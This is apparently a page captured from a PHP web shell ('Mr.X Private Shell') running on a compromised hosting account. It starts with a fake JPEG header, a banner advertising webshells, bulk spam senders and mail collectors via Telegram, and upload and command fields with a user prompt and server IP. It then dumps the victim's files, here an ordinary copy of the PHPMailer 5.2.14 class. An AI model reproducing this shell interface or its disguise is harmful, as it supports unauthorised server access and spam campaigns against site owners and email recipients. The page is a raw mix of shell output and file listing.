����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eliteafr@216.73.217.121: ~ $
home/eliteafr/pmb/classes/class.phpmailer.php000066600000421620152165345360015323 0ustar00<?php
// $Id: class.phpmailer.php,v 1.8.10.1 2016-04-13 15:13:15 dbellamy Exp $

if (stristr($_SERVER['REQUEST_URI'], "class.phpmailer.php")) die("no access");

/**
 * PHPMailer - PHP email creation and transport class.
 * PHP Version 5
 * @package PHPMailer
 * @link https://github.com/PHPMailer/PHPMailer/ The PHPMailer GitHub project
 * @author Marcus Bointon (Synchro/coolbru) <phpmailer@synchromedia.co.uk>
 * @author Jim Jagielski (jimjag) <jimjag@gmail.com>
 * @author Andy Prevost (codeworxtech) <codeworxtech@users.sourceforge.net>
 * @author Brent R. Matzelle (original founder)
 * @copyright 2012 - 2014 Marcus Bointon
 * @copyright 2010 - 2012 Jim Jagielski
 * @copyright 2004 - 2009 Andy Prevost
 * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
 * @note This program is distributed in the hope that it will be useful - WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.
 */

/**
 * PHPMailer - PHP email creation and transport class.
 * @package PHPMailer
 * @author Marcus Bointon (Synchro/coolbru) <phpmailer@synchromedia.co.uk>
 * @author Jim Jagielski (jimjag) <jimjag@gmail.com>
 * @author Andy Prevost (codeworxtech) <codeworxtech@users.sourceforge.net>
 * @author Brent R. Matzelle (original founder)
 */
class PHPMailer
{
    /**
     * The PHPMailer Version number.
     * @var string
     */
    public $Version = '5.2.14';

    /**
     * Email priority.
     * Options: null (default), 1 = High, 3 = Normal, 5 = low.
     * When null, the header is not set at all.
     * @var integer
     */
    public $Priority = null;

    /**
     * The character set of the message.
     * @var string
     */
    public $CharSet = 'iso-8859-1';

    /**
     * The MIME Content-type of the message.
     * @var string
     */
    public $ContentType = 'text/plain';

    /**
     * The message encoding.
     * Options: "8bit", "7bit", "binary", "base64", and "quoted-printable".
     * @var string
     */
    public $Encoding = '8bit';

    /**
     * Holds the most recent mailer error message.
     * @var string
     */
    public $ErrorInfo = '';

    /**
     * The From email address for the message.
     * @var string
     */
    public $From = 'root@localhost';

    /**
     * The From name of the message.
     * @var string
     */
    public $FromName = 'Root User';

    /**
     * The Sender email (Return-Path) of the message.
     * If not empty, will be sent via -f to sendmail or as 'MAIL FROM' in smtp mode.
     * @var string
     */
    public $Sender = '';

    /**
     * The Return-Path of the message.
     * If empty, it will be set to either From or Sender.
     * @var string
     * @deprecated Email senders should never set a return-path header;
     * it's the receiver's job (RFC5321 section 4.4), so this no longer does anything.
     * @link https://tools.ietf.org/html/rfc5321#section-4.4 RFC5321 reference
     */
    public $ReturnPath = '';

    /**
     * The Subject of the message.
     * @var string
     */
    public $Subject = '';

    /**
     * An HTML or plain text message body.
     * If HTML then call isHTML(true).
     * @var string
     */
    public $Body = '';

    /**
     * The plain-text message body.
     * This body can be read by mail clients that do not have HTML email
     * capability such as mutt & Eudora.
     * Clients that can read HTML will view the normal Body.
     * @var string
     */
    public $AltBody = '';

    /**
     * An iCal message part body.
     * Only supported in simple alt or alt_inline message types
     * To generate iCal events, use the bundled extras/EasyPeasyICS.php class or iCalcreator
     * @link http://sprain.ch/blog/downloads/php-class-easypeasyics-create-ical-files-with-php/
     * @link http://kigkonsult.se/iCalcreator/
     * @var string
     */
    public $Ical = '';

    /**
     * The complete compiled MIME message body.
     * @access protected
     * @var string
     */
    protected $MIMEBody = '';

    /**
     * The complete compiled MIME message headers.
     * @var string
     * @access protected
     */
    protected $MIMEHeader = '';

    /**
     * Extra headers that createHeader() doesn't fold in.
     * @var string
     * @access protected
     */
    protected $mailHeader = '';

    /**
     * Word-wrap the message body to this number of chars.
     * Set to 0 to not wrap. A useful value here is 78, for RFC2822 section 2.1.1 compliance.
     * @var integer
     */
    public $WordWrap = 0;

    /**
     * Which method to use to send mail.
     * Options: "mail", "sendmail", or "smtp".
     * @var string
     */
    public $Mailer = 'mail';

    /**
     * The path to the sendmail program.
     * @var string
     */
    public $Sendmail = '/usr/sbin/sendmail';

    /**
     * Whether mail() uses a fully sendmail-compatible MTA.
     * One which supports sendmail's "-oi -f" options.
     * @var boolean
     */
    public $UseSendmailOptions = true;

    /**
     * Path to PHPMailer plugins.
     * Useful if the SMTP class is not in the PHP include path.
     * @var string
     * @deprecated Should not be needed now there is an autoloader.
     */
    public $PluginDir = '';

    /**
     * The email address that a reading confirmation should be sent to, also known as read receipt.
     * @var string
     */
    public $ConfirmReadingTo = '';

    /**
     * The hostname to use in the Message-ID header and as default HELO string.
     * If empty, PHPMailer attempts to find one with, in order,
     * $_SERVER['SERVER_NAME'], gethostname(), php_uname('n'), or the value
     * 'localhost.localdomain'.
     * @var string
     */
    public $Hostname = '';

    /**
     * An ID to be used in the Message-ID header.
     * If empty, a unique id will be generated.
     * @var string
     */
    public $MessageID = '';

    /**
     * The message Date to be used in the Date header.
     * If empty, the current date will be added.
     * @var string
     */
    public $MessageDate = '';

    /**
     * SMTP hosts.
     * Either a single hostname or multiple semicolon-delimited hostnames.
     * You can also specify a different port
     * for each host by using this format: [hostname:port]
     * (e.g. "smtp1.example.com:25;smtp2.example.com").
     * You can also specify encryption type, for example:
     * (e.g. "tls://smtp1.example.com:587;ssl://smtp2.example.com:465").
     * Hosts will be tried in order.
     * @var string
     */
    public $Host = 'localhost';

    /**
     * The default SMTP server port.
     * @var integer
     * @TODO Why is this needed when the SMTP class takes care of it?
     */
    public $Port = 25;

    /**
     * The SMTP HELO of the message.
     * Default is $Hostname. If $Hostname is empty, PHPMailer attempts to find
     * one with the same method described above for $Hostname.
     * @var string
     * @see PHPMailer::$Hostname
     */
    public $Helo = '';

    /**
     * What kind of encryption to use on the SMTP connection.
     * Options: '', 'ssl' or 'tls'
     * @var string
     */
    public $SMTPSecure = '';

    /**
     * Whether to enable TLS encryption automatically if a server supports it,
     * even if `SMTPSecure` is not set to 'tls'.
     * Be aware that in PHP >= 5.6 this requires that the server's certificates are valid.
     * @var boolean
     */
    public $SMTPAutoTLS = true;

    /**
     * Whether to use SMTP authentication.
     * Uses the Username and Password properties.
     * @var boolean
     * @see PHPMailer::$Username
     * @see PHPMailer::$Password
     */
    public $SMTPAuth = false;

    /**
     * Options array passed to stream_context_create when connecting via SMTP.
     * @var array
     */
    public $SMTPOptions = array();

    /**
     * SMTP username.
     * @var string
     */
    public $Username = '';

    /**
     * SMTP password.
     * @var string
     */
    public $Password = '';

    /**
     * SMTP auth type.
     * Options are LOGIN (default), PLAIN, NTLM, CRAM-MD5
     * @var string
     */
    public $AuthType = '';

    /**
     * SMTP realm.
     * Used for NTLM auth
     * @var string
     */
    public $Realm = '';

    /**
     * SMTP workstation.
     * Used for NTLM auth
     * @var string
     */
    public $Workstation = '';

    /**
     * The SMTP server timeout in seconds.
     * Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2
     * @var integer
     */
    public $Timeout = 300;

    /**
     * SMTP class debug output mode.
     * Debug output level.
     * Options:
     * * `0` No output
     * * `1` Commands
     * * `2` Data and commands
     * * `3` As 2 plus connection status
     * * `4` Low-level data output
     * @var integer
     * @see SMTP::$do_debug
     */
    public $SMTPDebug = 0;

    /**
     * How to handle debug output.
     * Options:
     * * `echo` Output plain-text as-is, appropriate for CLI
     * * `html` Output escaped, line breaks converted to `<br>`, appropriate for browser output
     * * `error_log` Output to error log as configured in php.ini
     *
     * Alternatively, you can provide a callable expecting two params: a message string and the debug level:
     * <code>
     * $mail->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";};
     * </code>
     * @var string|callable
     * @see SMTP::$Debugoutput
     */
    public $Debugoutput = 'echo';

    /**
     * Whether to keep SMTP connection open after each message.
     * If this is set to true then to close the connection
     * requires an explicit call to smtpClose().
     * @var boolean
     */
    public $SMTPKeepAlive = false;

    /**
     * Whether to split multiple to addresses into multiple messages
     * or send them all in one message.
     * Only supported in `mail` and `sendmail` transports, not in SMTP.
     * @var boolean
     */
    public $SingleTo = false;

    /**
     * Storage for addresses when SingleTo is enabled.
     * @var array
     * @TODO This should really not be public
     */
    public $SingleToArray = array();

    /**
     * Whether to generate VERP addresses on send.
     * Only applicable when sending via SMTP.
     * @link https://en.wikipedia.org/wiki/Variable_envelope_return_path
     * @link http://www.postfix.org/VERP_README.html Postfix VERP info
     * @var boolean
     */
    public $do_verp = false;

    /**
     * Whether to allow sending messages with an empty body.
     * @var boolean
     */
    public $AllowEmpty = false;

    /**
     * The default line ending.
     * @note The default remains "\n". We force CRLF where we know
     *        it must be used via self::CRLF.
     * @var string
     */
    public $LE = "\n";

    /**
     * DKIM selector.
     * @var string
     */
    public $DKIM_selector = '';

    /**
     * DKIM Identity.
     * Usually the email address used as the source of the email
     * @var string
     */
    public $DKIM_identity = '';

    /**
     * DKIM passphrase.
     * Used if your key is encrypted.
     * @var string
     */
    public $DKIM_passphrase = '';

    /**
     * DKIM signing domain name.
     * @example 'example.com'
     * @var string
     */
    public $DKIM_domain = '';

    /**
     * DKIM private key file path.
     * @var string
     */
    public $DKIM_private = '';

    /**
     * Callback Action function name.
     *
     * The function that handles the result of the send email action.
     * It is called out by send() for each email sent.
     *
     * Value can be any php callable: http://www.php.net/is_callable
     *
     * Parameters:
     *   boolean $result        result of the send action
     *   string  $to            email address of the recipient
     *   string  $cc            cc email addresses
     *   string  $bcc           bcc email addresses
     *   string  $subject       the subject
     *   string  $body          the email body
     *   string  $from          email address of sender
     * @var string
     */
    public $action_function = '';

    /**
     * What to put in the X-Mailer header.
     * Options: An empty string for PHPMailer default, whitespace for none, or a string to use
     * @var string
     */
    public $XMailer = '';

    /**
     * An instance of the SMTP sender class.
     * @var SMTP
     * @access protected
     */
    protected $smtp = null;

    /**
     * The array of 'to' names and addresses.
     * @var array
     * @access protected
     */
    protected $to = array();

    /**
     * The array of 'cc' names and addresses.
     * @var array
     * @access protected
     */
    protected $cc = array();

    /**
     * The array of 'bcc' names and addresses.
     * @var array
     * @access protected
     */
    protected $bcc = array();

    /**
     * The array of reply-to names and addresses.
     * @var array
     * @access protected
     */
    protected $ReplyTo = array();

    /**
     * An array of all kinds of addresses.
     * Includes all of $to, $cc, $bcc
     * @var array
     * @access protected
     * @see PHPMailer::$to @see PHPMailer::$cc @see PHPMailer::$bcc
     */
    protected $all_recipients = array();

    /**
     * An array of names and addresses queued for validation.
     * In send(), valid and non duplicate entries are moved to $all_recipients
     * and one of $to, $cc, or $bcc.
     * This array is used only for addresses with IDN.
     * @var array
     * @access protected
     * @see PHPMailer::$to @see PHPMailer::$cc @see PHPMailer::$bcc
     * @see PHPMailer::$all_recipients
     */
    protected $RecipientsQueue = array();

    /**
     * An array of reply-to names and addresses queued for validation.
     * In send(), valid and non duplicate entries are moved to $ReplyTo.
     * This array is used only for addresses with IDN.
     * @var array
     * @access protected
     * @see PHPMailer::$ReplyTo
     */
    protected $ReplyToQueue = array();

    /**
     * The array of attachments.
     * @var array
     * @access protected
     */
    protected $attachment = array();

    /**
     * The array of custom headers.
     * @var array
     * @access protected
     */
    protected $CustomHeader = array();

    /**
     * The most recent Message-ID (including angular brackets).
     * @var string
     * @access protected
     */
    protected $lastMessageID = '';

    /**
     * The message's MIME type.
     * @var string
     * @access protected
     */
    protected $message_type = '';

    /**
     * The array of MIME boundary strings.
     * @var array
     * @access protected
     */
    protected $boundary = array();

    /**
     * The array of available languages.
     * @var array
     * @access protected
     */
    protected $language = array();

    /**
     * The number of errors encountered.
     * @var integer
     * @access protected
     */
    protected $error_count = 0;

    /**
     * The S/MIME certificate file path.
     * @var string
     * @access protected
     */
    protected $sign_cert_file = '';

    /**
     * The S/MIME key file path.
     * @var string
     * @access protected
     */
    protected $sign_key_file = '';

    /**
     * The optional S/MIME extra certificates ("CA Chain") file path.
     * @var string
     * @access protected
     */
    protected $sign_extracerts_file = '';

    /**
     * The S/MIME password for the key.
     * Used only if the key is encrypted.
     * @var string
     * @access protected
     */
    protected $sign_key_pass = '';

    /**
     * Whether to throw exceptions for errors.
     * @var boolean
     * @access protected
     */
    protected $exceptions = false;

    /**
     * Unique ID used for message ID and boundaries.
     * @var string
     * @access protected
     */
    protected $uniqueid = '';

    /**
     * Error severity: message only, continue processing.
     */
    const STOP_MESSAGE = 0;

    /**
     * Error severity: message, likely ok to continue processing.
     */
    const STOP_CONTINUE = 1;

    /**
     * Error severity: message, plus full stop, critical error reached.
     */
    const STOP_CRITICAL = 2;

    /**
     * SMTP RFC standard line ending.
     */
    const CRLF = "\r\n";

    /**
     * The maximum line length allowed by RFC 2822 section 2.1.1
     * @var integer
     */
    const MAX_LINE_LENGTH = 998;

    /**
     * Constructor.
     * @param boolean $exceptions Should we throw external exceptions?
     */
    public function __construct($exceptions = null)
    {
        if ($exceptions !== null) {
            $this->exceptions = (boolean)$exceptions;
        }
    }

    /**
     * Destructor.
     */
    public function __destruct()
    {
        //Close any open SMTP connection nicely
        $this->smtpClose();
    }

    /**
     * Call mail() in a safe_mode-aware fashion.
     * Also, unless sendmail_path points to sendmail (or something that
     * claims to be sendmail), don't pass params (not a perfect fix,
     * but it will do)
     * @param string $to To
     * @param string $subject Subject
     * @param string $body Message Body
     * @param string $header Additional Header(s)
     * @param string $params Params
     * @access private
     * @return boolean
     */
    private function mailPassthru($to, $subject, $body, $header, $params)
    {
        //Check overloading of mail function to avoid double-encoding
        if (ini_get('mbstring.func_overload') & 1) {
            $subject = $this->secureHeader($subject);
        } else {
            $subject = $this->encodeHeader($this->secureHeader($subject));
        }
        if (ini_get('safe_mode') || !($this->UseSendmailOptions)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }
        return $result;
    }

    /**
     * Output debugging info via user-defined method.
     * Only generates output if SMTP debug output is enabled (@see SMTP::$do_debug).
     * @see PHPMailer::$Debugoutput
     * @see PHPMailer::$SMTPDebug
     * @param string $str
     */
    protected function edebug($str)
    {
        if ($this->SMTPDebug <= 0) {
            return;
        }
        //Avoid clash with built-in function names
        if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {
            call_user_func($this->Debugoutput, $str, $this->SMTPDebug);
            return;
        }
        switch ($this->Debugoutput) {
            case 'error_log':
                //Don't output, just log
                error_log($str);
                break;
            case 'html':
                //Cleans up output a bit for a better looking, HTML-safe output
                echo htmlentities(
                    preg_replace('/[\r\n]+/', '', $str),
                    ENT_QUOTES,
                    'UTF-8'
                )
                . "<br>\n";
                break;
            case 'echo':
            default:
                //Normalize line breaks
                $str = preg_replace('/\r\n?/ms', "\n", $str);
                echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
                    "\n",
                    "\n                   \t                  ",
                    trim($str)
                ) . "\n";
        }
    }

    /**
     * Sets message type to HTML or plain.
     * @param boolean $isHtml True for HTML mode.
     * @return void
     */
    public function isHTML($isHtml = true)
    {
        if ($isHtml) {
            $this->ContentType = 'text/html';
        } else {
            $this->ContentType = 'text/plain';
        }
    }

    /**
     * Send messages using SMTP.
     * @return void
     */
    public function isSMTP()
    {
        $this->Mailer = 'smtp';
    }

    /**
     * Send messages using PHP's mail() function.
     * @return void
     */
    public function isMail()
    {
        $this->Mailer = 'mail';
    }

    /**
     * Send messages using $Sendmail.
     * @return void
     */
    public function isSendmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'sendmail')) {
            $this->Sendmail = '/usr/sbin/sendmail';
        } else {
            $this->Sendmail = $ini_sendmail_path;
        }
        $this->Mailer = 'sendmail';
    }

    /**
     * Send messages using qmail.
     * @return void
     */
    public function isQmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'qmail')) {
            $this->Sendmail = '/var/qmail/bin/qmail-inject';
        } else {
            $this->Sendmail = $ini_sendmail_path;
        }
        $this->Mailer = 'qmail';
    }

    /**
     * Add a "To" address.
     * @param string $address The email address to send to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addAddress($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('to', $address, $name);
    }

    /**
     * Add a "CC" address.
     * @note: This function works with the SMTP mailer on win32, not with the "mail" mailer.
     * @param string $address The email address to send to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addCC($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('cc', $address, $name);
    }

    /**
     * Add a "BCC" address.
     * @note: This function works with the SMTP mailer on win32, not with the "mail" mailer.
     * @param string $address The email address to send to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addBCC($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('bcc', $address, $name);
    }

    /**
     * Add a "Reply-To" address.
     * @param string $address The email address to reply to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addReplyTo($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('Reply-To', $address, $name);
    }

    /**
     * Add an address to one of the recipient arrays or to the ReplyTo array. Because PHPMailer
     * can't validate addresses with an IDN without knowing the PHPMailer::$CharSet (that can still
     * be modified after calling this function), addition of such addresses is delayed until send().
     * Addresses that have been added already return false, but do not throw exceptions.
     * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo'
     * @param string $address The email address to send, resp. to reply to
     * @param string $name
     * @throws phpmailerException
     * @return boolean true on success, false if address already used or invalid in some way
     * @access protected
     */
    protected function addOrEnqueueAnAddress($kind, $address, $name)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        if (($pos = strrpos($address, '@')) === false) {
            // At-sign is misssing.
            $error_message = $this->lang('invalid_address') . " (addAnAddress $kind): $address";
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        $params = array($kind, $address, $name);
        // Enqueue addresses with IDN until we know the PHPMailer::$CharSet.
        if ($this->has8bitChars(substr($address, ++$pos)) and $this->idnSupported()) {
            if ($kind != 'Reply-To') {
                if (!array_key_exists($address, $this->RecipientsQueue)) {
                    $this->RecipientsQueue[$address] = $params;
                    return true;
                }
            } else {
                if (!array_key_exists($address, $this->ReplyToQueue)) {
                    $this->ReplyToQueue[$address] = $params;
                    return true;
                }
            }
            return false;
        }
        // Immediately add standard addresses without IDN.
        return call_user_func_array(array($this, 'addAnAddress'), $params);
    }

    /**
     * Add an address to one of the recipient arrays or to the ReplyTo array.
     * Addresses that have been added already return false, but do not throw exceptions.
     * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo'
     * @param string $address The email address to send, resp. to reply to
     * @param string $name
     * @throws phpmailerException
     * @return boolean true on success, false if address already used or invalid in some way
     * @access protected
     */
    protected function addAnAddress($kind, $address, $name = '')
    {
        if (!in_array($kind, array('to', 'cc', 'bcc', 'Reply-To'))) {
            $error_message = $this->lang('Invalid recipient kind: ') . $kind;
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        if (!$this->validateAddress($address)) {
            $error_message = $this->lang('invalid_address') . " (addAnAddress $kind): $address";
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        if ($kind != 'Reply-To') {
            if (!array_key_exists(strtolower($address), $this->all_recipients)) {
                array_push($this->$kind, array($address, $name));
                $this->all_recipients[strtolower($address)] = true;
                return true;
            }
        } else {
            if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
                $this->ReplyTo[strtolower($address)] = array($address, $name);
                return true;
            }
        }
        return false;
    }

    /**
     * Parse and validate a string containing one or more RFC822-style comma-separated email addresses
     * of the form "display name <address>" into an array of name/address pairs.
     * Uses the imap_rfc822_parse_adrlist function if the IMAP extension is available.
     * Note that quotes in the name part are removed.
     * @param string $addrstr The address list string
     * @param bool $useimap Whether to use the IMAP extension to parse the list
     * @return array
     * @link http://www.andrew.cmu.edu/user/agreen1/testing/mrbs/web/Mail/RFC822.php A more careful implementation
     */
    public function parseAddresses($addrstr, $useimap = true)
    {
        $addresses = array();
        if ($useimap and function_exists('imap_rfc822_parse_adrlist')) {
            //Use this built-in parser if it's available
            $list = imap_rfc822_parse_adrlist($addrstr, '');
            foreach ($list as $address) {
                if ($address->host != '.SYNTAX-ERROR.') {
                    if ($this->validateAddress($address->mailbox . '@' . $address->host)) {
                        $addresses[] = array(
                            'name' => (property_exists($address, 'personal') ? $address->personal : ''),
                            'address' => $address->mailbox . '@' . $address->host
                        );
                    }
                }
            }
        } else {
            //Use this simpler parser
            $list = explode(',', $addrstr);
            foreach ($list as $address) {
                $address = trim($address);
                //Is there a separate name part?
                if (strpos($address, '<') === false) {
                    //No separate name, just use the whole thing
                    if ($this->validateAddress($address)) {
                        $addresses[] = array(
                            'name' => '',
                            'address' => $address
                        );
                    }
                } else {
                    list($name, $email) = explode('<', $address);
                    $email = trim(str_replace('>', '', $email));
                    if ($this->validateAddress($email)) {
                        $addresses[] = array(
                            'name' => trim(str_replace(array('"', "'"), '', $name)),
                            'address' => $email
                        );
                    }
                }
            }
        }
        return $addresses;
    }

    /**
     * Set the From and FromName properties.
     * @param string $address
     * @param string $name
     * @param boolean $auto Whether to also set the Sender address, defaults to true
     * @throws phpmailerException
     * @return boolean
     */
    public function setFrom($address, $name = '', $auto = true)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        // Don't validate now addresses with IDN. Will be done in send().
        if (($pos = strrpos($address, '@')) === false or
            (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and
            !$this->validateAddress($address)) {
            $error_message = $this->lang('invalid_address') . " (setFrom) $address";
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        $this->From = $address;
        $this->FromName = $name;
        if ($auto) {
            if (empty($this->Sender)) {
                $this->Sender = $address;
            }
        }
        return true;
    }

    /**
     * Return the Message-ID header of the last email.
     * Technically this is the value from the last time the headers were created,
     * but it's also the message ID of the last sent message except in
     * pathological cases.
     * @return string
     */
    public function getLastMessageID()
    {
        return $this->lastMessageID;
    }

    /**
     * Check that a string looks like an email address.
     * @param string $address The email address to check
     * @param string $patternselect A selector for the validation pattern to use :
     * * `auto` Pick best pattern automatically;
     * * `pcre8` Use the squiloople.com pattern, requires PCRE > 8.0, PHP >= 5.3.2, 5.2.14;
     * * `pcre` Use old PCRE implementation;
     * * `php` Use PHP built-in FILTER_VALIDATE_EMAIL;
     * * `html5` Use the pattern given by the HTML5 spec for 'email' type form input elements.
     * * `noregex` Don't use a regex: super fast, really dumb.
     * @return boolean
     * @static
     * @access public
     */
    public static function validateAddress($address, $patternselect = 'auto')
    {
        //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321
        if (strpos($address, "\n") !== false or strpos($address, "\r") !== false) {
            return false;
        }
        if (!$patternselect or $patternselect == 'auto') {
            //Check this constant first so it works when extension_loaded() is disabled by safe mode
            //Constant was added in PHP 5.2.4
            if (defined('PCRE_VERSION')) {
                //This pattern can get stuck in a recursive loop in PCRE <= 8.0.2
                if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {
                    $patternselect = 'pcre8';
                } else {
                    $patternselect = 'pcre';
                }
            } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
                //Fall back to older PCRE
                $patternselect = 'pcre';
            } else {
                //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
                if (version_compare(PHP_VERSION, '5.2.0') >= 0) {
                    $patternselect = 'php';
                } else {
                    $patternselect = 'noregex';
                }
            }
        }
        switch ($patternselect) {
            case 'pcre8':
                /**
                 * Uses the same RFC5322 regex on which FILTER_VALIDATE_EMAIL is based, but allows dotless domains.
                 * @link http://squiloople.com/2009/12/20/email-address-validation/
                 * @copyright 2009-2010 Michael Rushton
                 * Feel free to use and redistribute this code. But please keep this copyright notice.
                 */
                return (boolean)preg_match(
                    '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
                    '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
                    '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
                    '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
                    '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
                    '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
                    '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
                    '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
                    $address
                );
            case 'pcre':
                //An older regex that doesn't need a recent PCRE
                return (boolean)preg_match(
                    '/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .
                    '[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
                    '(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
                    '@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .
                    '(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .
                    '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .
                    '::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .
                    '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .
                    '::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
                    $address
                );
            case 'html5':
                /**
                 * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements.
                 * @link http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)
                 */
                return (boolean)preg_match(
                    '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
                    '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
                    $address
                );
            case 'noregex':
                //No PCRE! Do something _very_ approximate!
                //Check the address is 3 chars or longer and contains an @ that's not the first or last char
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);
            case 'php':
            default:
                return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
        }
    }

    /**
     * Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the
     * "intl" and "mbstring" PHP extensions.
     * @return bool "true" if required functions for IDN support are present
     */
    public function idnSupported()
    {
        // @TODO: Write our own "idn_to_ascii" function for PHP <= 5.2.
        return function_exists('idn_to_ascii') and function_exists('mb_convert_encoding');
    }

    /**
     * Converts IDN in given email address to its ASCII form, also known as punycode, if possible.
     * Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet.
     * This function silently returns unmodified address if:
     * - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form)
     * - Conversion to punycode is impossible (e.g. required PHP functions are not available)
     *   or fails for any reason (e.g. domain has characters not allowed in an IDN)
     * @see PHPMailer::$CharSet
     * @param string $address The email address to convert
     * @return string The encoded address in ASCII form
     */
    public function punyencodeAddress($address)
    {
